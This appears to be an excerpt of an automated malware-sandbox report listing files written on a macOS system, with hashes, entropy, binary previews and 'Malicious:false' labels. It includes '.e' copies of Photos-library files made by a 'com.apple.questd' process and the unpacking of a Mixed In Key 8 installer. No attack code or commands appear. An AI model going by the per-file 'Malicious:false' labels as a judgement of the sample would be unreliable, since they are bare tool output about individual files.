                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.316782821948111
                                                                                                    Encrypted:false
                                                                                                    MD5:F49BB6C1EB09488B6FBCDAE1EB0FBC5F
                                                                                                    SHA1:A81680B06DBC6ADAA97FB970F69259FC0A4E7AC1
                                                                                                    SHA-256:D2C354A3D1BF5EEB90AFA2229CE673E33FB08880EB7AB78226DA8C4B2C9A613C
                                                                                                    SHA-512:D75EB30A9C33E265FF79E16068D6CE9249D67A50B1847458697C715738611A06A446EFFD65E1E4BCF67E22FA747E5B587A30419393FC438C03EDD884A96977CF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.*......W.`...8t....G9_..o...E..G.4.,..`>.k....L.*......W.`...8t....G9_..f..d..7G.4.,..`Z..=...B.+..f....9.o..h$........Z..=...BR..g.j..d..~/.+..........................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/.mediaanalysis.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/.mediaanalysis.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):41292
                                                                                                    Entropy (8bit):3.7342113770399803
                                                                                                    Encrypted:false
                                                                                                    MD5:200D5E3CF319211C19E8802150A6A61C
                                                                                                    SHA1:9F0FD3478754658B7E87CBFE8BA7595734F0CBF4
                                                                                                    SHA-256:C1B40A05E9930FC962C2E68E72FB333DEACFFEB2CD7AAC618712BFD6D1DDC7C6
                                                                                                    SHA-512:1A646685FD2C0C37164BFB1CBC71580F2CDC48A1F29694DAF097A55C1943402A84A5510D95DE474A94E4C13926698BD47BFD77A081C4FE3EB64FC75DD0F1B1AF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.....+D........y..?=._`...........{.kf..................L.D<.+...BJ..Jz;.......'w.v...Gb&..f&...+._D.K..................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.photoanalysisd/VisionService/.AlgoFaceClusterCache.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):562
                                                                                                    Entropy (8bit):6.229331723323959
                                                                                                    Encrypted:false
                                                                                                    MD5:E4FAB58C36EA97231E1424A5558AD183
                                                                                                    SHA1:9647263986577685BFBC2B9EC07ECB8AD4E8439A
                                                                                                    SHA-256:7469CBED0BD147090DEB17AEB6820E770D7232D4A0A57AE2BEE2A3BDE6865EE8
                                                                                                    SHA-512:0CEF28FC13CBF40FDAF45E69152F913999BDC8E50DDD74A6A529952B0440A8377343D79B74222BC6F8AD1B61FD1DFE1A12FF9A10BFD8A6866FEB20943C8A85A9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...G...G.....!....6i...G..@.7R......+..OXN.l.."jd~...7....Ec\..}jL...HX...C..p.9....5..Qzl...#.VI......\.v.h]...\..G.......2....-J........}Y...?1H...h..[V..n,3.. V..B>....N\......)..F.I......\..3.....7r.UY...I....EC..z.4.Qt?...{).."n.>\.N..........h..H.D.&..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Pictures/Photos Library.photoslibrary/resources/..metadata_never_index.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Public/..com.apple.timemachine.supported.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /dev/null
                                                                                                    Process:/usr/bin/osascript
                                                                                                    File Type:very short file (no magic)
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    MD5:68B329DA9893E34099C7D8AD5CB9C940
                                                                                                    SHA1:ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
                                                                                                    SHA-256:01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
                                                                                                    SHA-512:BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .
                                                                                                    /private/var/db/.dat.nosync02ed.qXMjdO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):4.982914434460289
                                                                                                    Encrypted:false
                                                                                                    MD5:1759FC0756A06F64FB0A04EEB5A15C55
                                                                                                    SHA1:F7EFD9D46F441CBFAB640428F50F99FA4412049C
                                                                                                    SHA-256:97ECCE72E2D582806BB7852FF846DBF7B881112870C9B9EA43F8C31CD16529A8
                                                                                                    SHA-512:7552D8995140727C6C20CC691735EF5271DBBBB3E2CAD295AE500D5ACC9E60D0237601F89AB4843DD287A2BC0848A665CB0B6AE2AC002569EC40D59464365180
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<array>..<string>/Applications</string>..<string>/Library</string>..<string>/System</string>..<string>/bin</string>..<string>/private</string>..<string>/sbin</string>..<string>/usr</string>.</array>.</plist>.
                                                                                                    /private/var/db/receipts/com.mixedinkey.installer.bom
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mac OS X bill of materials (BOM) file
                                                                                                    Size (bytes):102129
                                                                                                    Entropy (8bit):3.9078030958047103
                                                                                                    Encrypted:false
                                                                                                    MD5:0F07CB15D467ADBA0A80120EF583D92C
                                                                                                    SHA1:9A66033FCBBD2C4A4AD82D173B7D686FEBCD7509
                                                                                                    SHA-256:977D7B35B060620E979CD8337EF0E4972AFC08388986354B7A6B57763D0450D4
                                                                                                    SHA-512:E681F21EB24279DD9BF4F9C9F339F075E6E948D497FB42C4BF614425C4C62BAE8FB9E71D9EFC61A50F3D6957C211AAEBBC20D36836A0D212D96950C252F93561
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: BOMStore..........9i..U...#"...<.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................nfo............tree.................Paths......................................................................."...!...(...'...................%...$...................Q...P...........F...E...c...b...N...M...B...A...........!... ...C...B...-...,...................$...#...:...9...........Z...Y...................@...?...................1...0...........9...8...4...3...................7...6...K...J...]...\...y...x...........?...>...l...k...W...V...........`..._.......-...*..
                                                                                                    /private/var/db/receipts/com.mixedinkey.installer.plist
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):258
                                                                                                    Entropy (8bit):5.396476162957477
                                                                                                    Encrypted:false
                                                                                                    MD5:2BC57BE7C27FCD0592F09B46FE1381C5
                                                                                                    SHA1:29AC612F6A9FC269A36D640182498C48600F3FFA
                                                                                                    SHA-256:4E71CA8F19223D44D0FF49FF228BE9513D29D757B90342525AF2D4C0A11E9C4C
                                                                                                    SHA-512:BE807970430427F31B822CE875B2B6BF4B6267122A64D3E36576479CB7CFA06400E10512D29299F7EC5CF084F554441AB907640BF8B4ED5EA2C22822863EC404
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.............^PackageVersion_..PackageIdentifier_..InstallPrefixPath[InstallDate_..PackageFileName_..InstallProcessNameU8.5.3_..com.mixedinkey.installer\Applications3A.Viz.+A_..Mixed_In_Key_8.pkgYInstaller..$8LXj......................................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Boms/com.mixedinkey.installer.bom
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mac OS X bill of materials (BOM) file
                                                                                                    Size (bytes):102129
                                                                                                    Entropy (8bit):3.9078030958047103
                                                                                                    Encrypted:false
                                                                                                    MD5:0F07CB15D467ADBA0A80120EF583D92C
                                                                                                    SHA1:9A66033FCBBD2C4A4AD82D173B7D686FEBCD7509
                                                                                                    SHA-256:977D7B35B060620E979CD8337EF0E4972AFC08388986354B7A6B57763D0450D4
                                                                                                    SHA-512:E681F21EB24279DD9BF4F9C9F339F075E6E948D497FB42C4BF614425C4C62BAE8FB9E71D9EFC61A50F3D6957C211AAEBBC20D36836A0D212D96950C252F93561
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: BOMStore..........9i..U...#"...<.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................nfo............tree.................Paths......................................................................."...!...(...'...................%...$...................Q...P...........F...E...c...b...N...M...B...A...........!... ...C...B...-...,...................$...#...:...9...........Z...Y...................@...?...................1...0...........9...8...4...3...................7...6...K...J...]...\...y...x...........?...>...l...k...W...V...........`..._.......-...*..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/.BC.T_Kt2uij
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):3293
                                                                                                    Entropy (8bit):5.120378073910887
                                                                                                    Encrypted:false
                                                                                                    MD5:EB5BA03F7E18E66F902C3080682D4476
                                                                                                    SHA1:F9FB20C25769BF24B717A18755D442B00F91EE9B
                                                                                                    SHA-256:25462EB1953770CB4B44669D2480C5B772A977DE699CAA181C408F20835790AB
                                                                                                    SHA-512:67F30B0ACE358BF41322235C10262F44324F2B8E11B50702FF95AFD52C39934EDFCC16D7009332DD60CDFB4A416B1A375474637ACFD58F319BC08CD987408DC5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>ATSApplicationFontsPath</key>..<string>fonts</string>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleDocumentTypes</key>..<array>...<dict>....<key>CFBundleTypeExtensions</key>....<array>.....<string>miktheme</string>....</array>....<key>CFBundleTypeName</key>....<string>Theme</string>....<key>CFBundleTypeRole</key>....<string>Viewer</string>....<key>LSTypeIsPackage</key>....<true/>....<key>NSPersistentStoreTypeKey</key>....<string>XML</string>...</dict>...<dict>....<key>CFBundleTypeExtensions</key>....<array>.....<string>mp3</string>.....<string>mp4</string>.....<string>m4p</string>.....<string>m4a</string>.....<string>wav</string>.....<string>aif</string>.....<string>aiff</string>.....<string>flac</string>....</array>....<key
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_16hDMO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):58464
                                                                                                    Entropy (8bit):4.421574151237082
                                                                                                    Encrypted:false
                                                                                                    MD5:AE149F9D463448FC54E64C94EE57DBBC
                                                                                                    SHA1:D25B63373E7158715C43F83B6A740061FF99D36B
                                                                                                    SHA-256:D9908207551DB3A493B8156F077BBF61560892C3CD852D91F09C2379BD388173
                                                                                                    SHA-512:9CA169496324850F92AE330CDB931155BAD9AEA6C77E855D00289546C61FDD92E1126F10D5533F740E4E7CEF729DEA50B28E6916EC52AA84526011EB1BE4CF13
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT...................`...............`......................__text..........__TEXT...........8...............8..............................__stubs.........__TEXT..........jW..............jW..............................__stub_helper...__TEXT..........lX..............lX..............................__swift3_typeref__TEXT..........*Z......G.......*Z..............................__swift3_capture__TEXT..........tZ......@.......tZ..............................__cstring.......__TEXT...........Z...............Z..............................__swift3_fieldmd__TEXT..........T[..............T[..............................__swift3_builtin__TEXT..........d[..............d[..............................__const.........__TEXT..........x[..............x[..............................__info_plist....__TEXT..........z[......9.......z[..............................__unwind_info...__TEXT...........]...............]..............................__eh_frame......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_AkzSJ2
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):45072
                                                                                                    Entropy (8bit):3.546164647554527
                                                                                                    Encrypted:false
                                                                                                    MD5:56D19F3001EB31B52B8D61EA54433AF0
                                                                                                    SHA1:CBC1DEF81F242C098D30011EB73FFA5EB3CBA522
                                                                                                    SHA-256:FDC50AD55EF91C295ECB4DDA4996BB06374482B6712BCEF01F78B37E9CB75765
                                                                                                    SHA-512:073A1DA2DD277876D4E01157B0F4495E3AECB149DDFAB24416F02BC07DB37A513E9AC2C68C41A0416DF00F5B332344DDAAA1CCF4F425B7D32EED960E21BEE444
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT...................@...............@......................__text..........__TEXT..........0:......;.......0:..............................__const.........__TEXT..........l=..............l=..............................__info_plist....__TEXT..........n=......?.......n=..............................__unwind_info...__TEXT...........?......H........?..................................8...__DATA...........@...............@..............................__objc_imageinfo__DATA...........@...............@..............................__data..........__DATA...........@......(........@..............................__common........__DATA..........0@..................................................H...__LINKEDIT.......P.......p.......P.......`..........................8...........6.......@rpath/libswiftIOKit.dylib......"...0............P.......................P..............xW..A....[..P.......P...............5...<.......................................
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_AocdHj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):49360
                                                                                                    Entropy (8bit):2.710370255582302
                                                                                                    Encrypted:false
                                                                                                    MD5:139214132CDC6BD1268529A5A05DAAFA
                                                                                                    SHA1:30257878B482F5C8A9C2489DEA5433EAF7017781
                                                                                                    SHA-256:1EE5558DFF8206B9CB580C09E3ED40AE7C7DC1FA122E30669041FFCCDB44B1AA
                                                                                                    SHA-512:3A1FE9FD5A430E31083F7B50959FFA5075BC71195E0E2F2362685AE685EBF45231D97B9D1FE3BFABB12F8FB464C129376FC3F2290AFD01D54DF07F65F9EAF2F3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................................8...__TEXT...................`...............`......................__text..........__TEXT...........]...............]..............................__const.........__TEXT...........]...............]..............................__info_plist....__TEXT...........]......G........]..................................8...__DATA...........`...............`..............................__objc_imageinfo__DATA...........`...............`..............................__data..........__DATA...........`......H........`..............................__common........__DATA..........P`..................................................H...__LINKEDIT.......p.......`.......p.......P..........................8...........6.......@rpath/libswiftCoreImage.dylib.."...0............p.......................q..0............q...... s..@.......P...................................................................................Az....9.....'v..$...............*.........`.........`...
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_CYCSVC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):44976
                                                                                                    Entropy (8bit):3.5060094976286664
                                                                                                    Encrypted:false
                                                                                                    MD5:CE8D359F3C1F7AB946DE28442AF91965
                                                                                                    SHA1:3E216CD55AFE082790C86948723E28AD55895AD5
                                                                                                    SHA-256:7B40A612D8E0C149E4ABEF89A2FA4CC64DC3B345E9EDD49AE9BB37EEF671EB79
                                                                                                    SHA-512:9A9EBF058AD995B6A7205BB5CDDFE8F66E657F896D08F7E136BA1082C7A36D00676074EA7152ABFFE9DE45B95269FDD05DA4AF8A575421740ED562302F6A0898
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................h...............(...__TEXT...................@...............@......................__text..........__TEXT...........:......z........:..............................__stubs.........__TEXT..........:=..............:=..............................__stub_helper...__TEXT..........L=..............L=..............................__const.........__TEXT..........z=..............z=..............................__info_plist....__TEXT..........|=......;.......|=..............................__unwind_info...__TEXT...........?......H........?..................................x...__DATA...........@...............@..............................__got...........__DATA...........@...............@..............................__nl_symbol_ptr.__DATA...........@...............@..............................__la_symbol_ptr.__DATA...........@...............@..............................__objc_imageinfo__DATA...........@...............@..............................__data..........__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_MDGfb4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):197168
                                                                                                    Entropy (8bit):5.668594966500052
                                                                                                    Encrypted:false
                                                                                                    MD5:EE6765DD7401F4FCECFC03E86B96DD88
                                                                                                    SHA1:E816BCEAC6D4F126F513319EEC1477B5866A66D2
                                                                                                    SHA-256:E643E6C1EE5945495B512BB4888133805EE1D599CE7D7F5B309CD5E29565C65B
                                                                                                    SHA-512:16680AE48E7638189B69C9A7FE90137FE787E275A71A2709186730CE3F110D1FC4039EBFB017DEA8775D82CEC98DB534EE327879591DF9DE36CC8A5AF33F768B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................x...................__TEXT...................0...............0......................__text..........__TEXT..........`M..............`M..............................__stubs.........__TEXT..........<.......<.......<...............................__stub_helper...__TEXT..........x.......t.......x...............................__const.........__TEXT..........................................................__cstring.......__TEXT..........................................................__swift3_typeref__TEXT..................@.......................................__swift3_fieldmd__TEXT........... ......T........ ..............................__swift3_reflstr__TEXT..........D!..............D!..............................__swift3_capture__TEXT..........\!..............\!..............................__swift3_assocty__TEXT..........."..............."..............................__swift2_proto..__TEXT..........."..............."..............................__info_plist....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_NChyg3
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):104816
                                                                                                    Entropy (8bit):4.8555468848268895
                                                                                                    Encrypted:false
                                                                                                    MD5:E029F5936C9A99876F22DE03D8E78962
                                                                                                    SHA1:60594976CC0A2E55B2D72CFE5580B562DF5A3BD2
                                                                                                    SHA-256:70FB7D3B5E768E820373C308CD111DF8B814EFB6FC5DEA95DAB85E375F8B5E9E
                                                                                                    SHA-512:D4464562CCEBE4D90B59CAC6BE40AB4A202A08A37502785F4D6EABE356CC9118D3D368F1FF8C217E3EE2E91456D7F70230AEF1B07022FEE0B74BC658035A7793
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................8...............X...__TEXT..........................................................__text..........__TEXT..........@`.......6......@`..............................__stubs.........__TEXT..........`...............`...............................__stub_helper...__TEXT..................<.......................................__cstring.......__TEXT..........P...............P...............................__objc_methname.__TEXT..........M.......H.......M...............................__swift3_typeref__TEXT..........................................................__swift3_capture__TEXT..........................................................__const.........__TEXT..........................................................__objc_classname__TEXT..................9.......................................__objc_methtype.__TEXT..........................................................__info_plist....__TEXT..................E.......................................__unwind_info...
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_SuPgKO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):77792
                                                                                                    Entropy (8bit):4.101071723494362
                                                                                                    Encrypted:false
                                                                                                    MD5:F341E889720FCDDF41C1B3B1AD41B8B2
                                                                                                    SHA1:EC8BCCAAF5B4075969C342649FD2F5042957A749
                                                                                                    SHA-256:BD9E58DF5A0DA43F45E91D7AF8F227201C2F6E026701F577E266341EFEC04974
                                                                                                    SHA-512:DB8D6808CCB99EF4FFA7EE146647B8B0B93C97875C5635B1D698BF13F4301DD770E3915AF02C844B4BD360BF8C40F9C368E739BA240A1E86B270F791C192100B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT..........................................................__text..........__TEXT..........._..............._..............................__stubs.........__TEXT..........<q......x.......<q..............................__stub_helper...__TEXT...........q...............q..............................__objc_methname.__TEXT...........r......I........r..............................__const.........__TEXT...........}......R........}..............................__cstring.......__TEXT..........@~......%.......@~..............................__info_plist....__TEXT..........e.......?.......e...............................__unwind_info...__TEXT.................. .......................................__eh_frame......__TEXT..................8...........................................X...__DATA................... ............... ......................__nl_symbol_ptr.__DATA..........................................................__got...........__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_hNkiNO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):175856
                                                                                                    Entropy (8bit):5.304424181928789
                                                                                                    Encrypted:false
                                                                                                    MD5:6F03B266D87B2899E22BE36D9EB48400
                                                                                                    SHA1:D5551D5AC615CD7A505F32A387AC2523B106922F
                                                                                                    SHA-256:66B510F3C97F0A168AE40EBD66F267B7CDC760608CE1FDB13034C34E49652686
                                                                                                    SHA-512:FCB9127BFB1CC425CF33EA5B1D9502949F583C61ACB2DB755CE99B21086702D215BBAA424FDB7408384CBEC29CB09B64123118298B2C808724469405D54D35B1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ................$...8...................__TEXT...................0...............0......................__text..........__TEXT..........................................................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..................:.......................................__const.........__TEXT..........0...............0...............................__objc_methname.__TEXT..........................................................__cstring.......__TEXT..........................................................__swift3_typeref__TEXT..........p...............p...............................__swift3_capture__TEXT..........P"......<.......P"..............................__swift3_fieldmd__TEXT..........."......l........"..............................__swift3_reflstr__TEXT...........#...............#..............................__swift3_assocty__TEXT...........#...............#..............................__swift2_proto..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_hoDbHL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):40896
                                                                                                    Entropy (8bit):3.111296069283955
                                                                                                    Encrypted:false
                                                                                                    MD5:948563D62566560D4CAE6E68E8EF3F3F
                                                                                                    SHA1:962326E5D28D8287D9C4EADF800F93E8FBCE4116
                                                                                                    SHA-256:7D24B806B32C9AB86A0FC14B7857361F29FF6BAA4C343FDB9F04C424298288DA
                                                                                                    SHA-512:AF57C37D2EE429DCA5F7F7F25D5376DF0F5A476D734CCCDD15E3941EFB17CAC2EF16C7385D71C37FF557E6176478391B2DCC148F7115431475FE4BA54D8DC84C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ........................................__TEXT...................@...............@......................__text..........__TEXT..........`<......N.......`<..............................__stubs.........__TEXT...........<...............<..............................__stub_helper...__TEXT...........<......8........<..............................__swift3_typeref__TEXT...........=...............=..............................__swift3_fieldmd__TEXT.......... =.............. =..............................__cstring.......__TEXT..........0=......!.......0=..............................__const.........__TEXT..........T=..............T=..............................__info_plist....__TEXT..........^=......Q.......^=..............................__unwind_info...__TEXT...........?......P........?..................................(...__DATA...........@...............@..............................__nl_symbol_ptr.__DATA...........@...............@..............................__la_symbol_ptr.__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_ltvtWH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):61392
                                                                                                    Entropy (8bit):3.0553938616638145
                                                                                                    Encrypted:false
                                                                                                    MD5:2E7ADDEAE4A46D6AA373431AE458518B
                                                                                                    SHA1:6B99EC2209B106D04070D18E17D8B501161AF2C6
                                                                                                    SHA-256:036D2D3BEF31ACA385F5C24C1DBE84B3B4AF7FE005232FBFC91C335A1BC6B1E9
                                                                                                    SHA-512:CE7AECBE0E32ACA93DE1E6264EE763FE9B6E908F3A8EBE1DB296F0756E89F5E4A731FA2CFB7B2C42CAFD37FBC5B204AEA22652CDEF1747A0D331907A71D5A5ED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
